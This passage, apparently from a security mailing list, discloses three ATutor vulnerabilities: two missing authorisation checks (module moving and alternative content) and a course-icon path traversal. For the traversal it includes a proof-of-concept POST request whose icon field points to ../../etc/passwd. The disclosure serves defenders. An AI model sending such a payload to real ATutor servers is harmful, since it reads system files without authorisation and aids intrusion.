Exploitable by: Instructors and students


------------------------------------------------------------------------------
Issue #30: Module moving missing authorisation check
------------------------------------------------------------------------------
Instructors are able to adjust the ordering of the modules for their course.
However, no authorisation check is performed on this operation, allowing any
user to perform similar moving of modules in a course.

Issue code location: move_module.php

Exploitable by: Students


------------------------------------------------------------------------------
Issue #31: Alternative content saving/deletion missing authorisation check
------------------------------------------------------------------------------
Instructors are able to save or delete existing alternative content (secondary
resources). However, no authorisation check is performed on this operation,
allowing any user to perform similar alternative content adjustments.

Issue code locations:
| mods/_core/editor/remove_alternative.php
| mods/_core/editor/save_alternative.php

Exploitable by: Students


------------------------------------------------------------------------------
Issue #32: Course icon retrieval path traversal
------------------------------------------------------------------------------
Instructors are able to modify a course's icon that is used to represent the
course in listings. This icon can either be an ATutor-provided icon or a
custom uploaded one. If an ATutor-provided icon is to be used, the path to the
icon on the filesystem is given in the request to set the course icon.
However, this path is not sanitised before being set; hence it is possible to
set the icon to refer to any file on the filesystem. When the course icon is
then retrieved in a subsequent request to the course icon retrieval URL, the
contents of this file will be disclosed to the user.

Issue code locations:
| Part 1: mods/_core/courses/lib/courses.inc.php:50
| Part 2: get_course_icon.php:32 (subsequent disclosure of file)

Exploitable by: Instructors

POC HTTP request (for part 1):
| POST /atutor/mods/_core/properties/course_properties.php HTTP/1.1
| Host: atutor-test
| Cookie: ATutorID=vhca1dlkjpu42klhakbqk38d23
| Connection: keep-alive
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 596
|
| form_course=true&MAX_FILE_SIZE=819200&course=1&old_access=public&created_date=2016-03-26+13%3a19%3a03&show_courses=0&current_cat=0&title=test&pri_lang=en&description=%0d&category_parent=0&content_packaging=top&rss=0&access=public&release_date=0&day_release=1&month_release=1&year_release=2016&hour_release=0&min_release=0&end_date=0&day_end=1&month_end=1&year_end=2017&hour_end=0&min_end=0&setvisual=1&banner=%0d&quota=-2&filesize=-3&tracking=%0d&copyright=%0d&boolForce=%0d&icon=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&MAX_FILE_SIZE=819200&customicon=%0d&custOptCount=0&courseId=1&submit=Save


- Matthew Daley
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.